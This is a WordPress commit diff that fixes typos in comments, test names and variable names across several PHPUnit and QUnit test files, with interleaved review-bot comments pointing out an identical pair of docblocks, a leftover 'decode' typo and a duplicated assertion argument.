<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/user/capabilities.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/user/capabilities.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/user/capabilities.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -992,7 +992,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Change the capabilites associated with a role and make sure the change
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Change the capabilities associated with a role and make sure the change
</ins><span class="cx" style="display: block; padding: 0 10px"> * is reflected in has_cap().
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function test_role_add_cap() {
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -1033,7 +1033,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Change the capabilites associated with a role and make sure the change
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Change the capabilities associated with a role and make sure the change
</ins><span class="cx" style="display: block; padding: 0 10px"> * is reflected in has_cap().
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function test_role_remove_cap() {
</span></span></pre></div>
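Review bot: The docblocks of `test_role_add_cap()` and `test_role_remove_cap()` are word-for-word identical after this change, so neither comment says which direction the test exercises. Going only by the method names, the first could read `Add a capability to a role and make sure the change is reflected in has_cap().` and the second `Remove a capability from a role and make sure the change is reflected in has_cap().`. Both method bodies lie outside the hunks, so the wording should be checked against what each test actually asserts.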
<a id="trunktestsphpunittestsusermapMetaCapphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/user/mapMetaCap.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/user/mapMetaCap.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/user/mapMetaCap.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -357,7 +357,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 27020
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_authorless_posts_capabilties() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_authorless_posts_capabilities() {
</ins><span class="cx" style="display: block; padding: 0 10px"> $post_id = self::factory()->post->create(
</span><span class="cx" style="display: block; padding: 0 10px"> array(
</span><span class="cx" style="display: block; padding: 0 10px"> 'post_author' => 0,
</span></span></pre></div>
<a id="trunktestsphpunittestsuserwpGetUsersWithNoRolephp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/user/wpGetUsersWithNoRole.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/user/wpGetUsersWithNoRole.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/user/wpGetUsersWithNoRole.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -111,10 +111,10 @@
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function test_get_users_with_no_role_matches_on_role_name() {
</span><span class="cx" style="display: block; padding: 0 10px"> // Create a role with a display name which would not match the role name
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // in a case-insentive SQL query.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // in a case-insensitive SQL query.
</ins><span class="cx" style="display: block; padding: 0 10px"> wp_roles()->add_role( 'somerole', 'Some role display name' );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- $someuser = self::factory()->user->create(
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ self::factory()->user->create(
</ins><span class="cx" style="display: block; padding: 0 10px"> array(
</span><span class="cx" style="display: block; padding: 0 10px"> 'role' => 'somerole',
</span><span class="cx" style="display: block; padding: 0 10px"> )
</span></span></pre></div>
<a id="trunktestsphpunittestsuserphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/user.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/user.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/user.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -1491,7 +1491,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> // Assert recipient is correct.
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( $new_email, $recipient->address, 'Admin email change notification recipient not as expected' );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Assert that HTML entites have been decode in body and subject.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Assert that HTML entities have been decode in body and subject.
</ins><span class="cx" style="display: block; padding: 0 10px"> $this->assertStringContainsString( '\'Test\' blog\'s "name" has <html entities> &', $email->subject, 'Email subject does not contain the decoded HTML entities' );
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertStringNotContainsString( ''Test' blog's "name" has <html entities> &', $email->subject, $email->subject, 'Email subject does contains HTML entities' );
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -1794,7 +1794,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> // Assert recipient is correct.
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( 'new-email@test.dev', $recipient->address, 'User email change confirmation recipient not as expected' );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Assert that HTML entites have been decoded in body and subject.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Assert that HTML entities have been decoded in body and subject.
</ins><span class="cx" style="display: block; padding: 0 10px"> $this->assertStringContainsString( '\'Test\' blog\'s "name" has <html entities> &', $email->subject, 'Email subject does not contain the decoded HTML entities' );
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertStringNotContainsString( ''Test' blog's "name" has <html entities> &', $email->subject, 'Email subject does contains HTML entities' );
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span></span></pre></div>
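Review bot: The added comment in the @@ -1491 hunk still reads "have been decode", while the same comment in the @@ -1794 hunk says "decoded"; as this commit is a typo pass, the line should be `// Assert that HTML entities have been decoded in body and subject.`. In that same first hunk the context call to `assertStringNotContainsString()` passes `$email->subject` twice, so the subject sits in the message position and 'Email subject does contains HTML entities' becomes a fourth argument that is presumably ignored. The matching call in the @@ -1794 hunk takes three arguments, and dropping the duplicate `$email->subject` would restore the intended failure message. Both test methods start outside the hunks.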
<a id="trunktestsphpunittestswidgetswpWidgetMediaImagephp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/widgets/wpWidgetMediaImage.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/widgets/wpWidgetMediaImage.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/widgets/wpWidgetMediaImage.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -478,7 +478,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertStringContainsString( 'width="100"', $output );
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertStringContainsString( 'height="100"', $output );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Embeded images.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Embedded images.
</ins><span class="cx" style="display: block; padding: 0 10px"> ob_start();
</span><span class="cx" style="display: block; padding: 0 10px"> $widget->render_media(
</span><span class="cx" style="display: block; padding: 0 10px"> array(
</span></span></pre></div>
<a id="trunktestsphpunittestsxmlrpcwpnewCommentphp"></a>
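--- a/trunk/tests/phpunit/tests/xmlrpc/wp/newComment.php
+++ b/trunk/tests/phpunit/tests/xmlrpc/wp/newComment.php
@@ -270,7 +270,7 @@
 *
 * @param string $post_key Post identifier from the self::$posts array.
 * @param string $username Username leaving comment.
- * @param bool $expected Expected result. True: successfull comment. False: Refused comment.
+ * @param bool $expected Expected result. True: successful comment. False: Refused comment.
 * @param string $anon_callback Optional. Allow anonymous comment callback. Default __return_false.
 */
 public function test_comments_observe_post_permissions( $post_key, $username, $expected, $anon_callback = '__return_false' ) {
@@ -304,7 +304,7 @@
 * @return array[] {
 * @type string Post identifier from the self::$posts array.
 * @type string Username leaving comment.
- * @type bool Expected result. True: successfull comment. False: Refused comment.
+ * @type bool Expected result. True: successful comment. False: Refused comment.
 * @type string Optional. Allow anonymous comment callback. Default __return_false.
 * }
 */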
<a id="trunktestsphpunittestsxmlrpcwpnewPostphp"></a>
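--- a/trunk/tests/phpunit/tests/xmlrpc/wp/newPost.php
+++ b/trunk/tests/phpunit/tests/xmlrpc/wp/newPost.php
@@ -247,7 +247,7 @@
 $post = array(
 'post_title' => 'Test',
 'terms' => array(
- 'foobar_nonexistant' => array( 1 ),
+ 'foobar_nonexistent' => array( 1 ),
 ),
 );
 $result = $this->myxmlrpcserver->wp_newPost( array( 1, 'editor', 'editor', $post ) );
@@ -257,7 +257,7 @@
 $post2 = array(
 'post_title' => 'Test',
 'terms_names' => array(
- 'foobar_nonexistant' => array( 1 ),
+ 'foobar_nonexistent' => array( 1 ),
 ),
 );
 $result2 = $this->myxmlrpcserver->wp_newPost( array( 1, 'editor', 'editor', $post2 ) );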
<a id="trunktestsqunitwpadminjscustomizecontrolsjs"></a>
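--- a/trunk/tests/qunit/wp-admin/js/customize-controls.js
+++ b/trunk/tests/qunit/wp-admin/js/customize-controls.js
@@ -679,17 +679,17 @@
 
 QUnit.module( 'Customize Utils: wp.customize.utils.getRemainingTime()' );
 QUnit.test( 'utils.getRemainingTime calculates time correctly', function( assert ) {
- var datetime = '2599-08-06 12:12:13', timeRemaining, timeRemainingWithDateInstance, timeRemaingingWithTimestamp;
+ var datetime = '2599-08-06 12:12:13', timeRemaining, timeRemainingWithDateInstance, timeRemainingWithTimestamp;
 
 timeRemaining = wp.customize.utils.getRemainingTime( datetime );
 timeRemainingWithDateInstance = wp.customize.utils.getRemainingTime( new Date( datetime.replace( /-/g, '/' ) ) );
- timeRemaingingWithTimestamp = wp.customize.utils.getRemainingTime( ( new Date( datetime.replace( /-/g, '/' ) ) ).getTime() );
+ timeRemainingWithTimestamp = wp.customize.utils.getRemainingTime( ( new Date( datetime.replace( /-/g, '/' ) ) ).getTime() );
 
 assert.equal( typeof timeRemaining, 'number', timeRemaining );
 assert.equal( typeof timeRemainingWithDateInstance, 'number', timeRemaining );
- assert.equal( typeof timeRemaingingWithTimestamp, 'number', timeRemaining );
+ assert.equal( typeof timeRemainingWithTimestamp, 'number', timeRemaining );
 assert.deepEqual( timeRemaining, timeRemainingWithDateInstance );
- assert.deepEqual( timeRemaining, timeRemaingingWithTimestamp );
+ assert.deepEqual( timeRemaining, timeRemainingWithTimestamp );
 });
 
 QUnit.module( 'Customize Utils: wp.customize.utils.getCurrentTimestamp()' );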
<a id="trunktestsqunitwpadminjsupdatesjs"></a>
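--- a/trunk/tests/qunit/wp-admin/js/updates.js
+++ b/trunk/tests/qunit/wp-admin/js/updates.js
@@ -15,9 +15,9 @@
 var menuItemCount = $( '#menu-plugins' ).find( '.plugin-count' ).eq( 0 ).text();
 var screenReaderItemCount = $( '#wp-admin-bar-updates' ).find( '.screen-reader-text' ).text();
 var adminItemCount = $( '#wp-admin-bar-updates' ).find( '.ab-label' ).text();
- assert.equal( menuItemCount, 2, 'Intial value is correct' );
- assert.equal( screenReaderItemCount, '2 Plugin Updates', 'Intial value is correct' );
- assert.equal( adminItemCount, 2, 'Intial value is correct' );
+ assert.equal( menuItemCount, 2, 'Initial value is correct' );
+ assert.equal( screenReaderItemCount, '2 Plugin Updates', 'Initial value is correct' );
+ assert.equal( adminItemCount, 2, 'Initial value is correct' );
 
 wp.updates.decrementCount( 'plugin' );
 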
</div>
</body>
</html>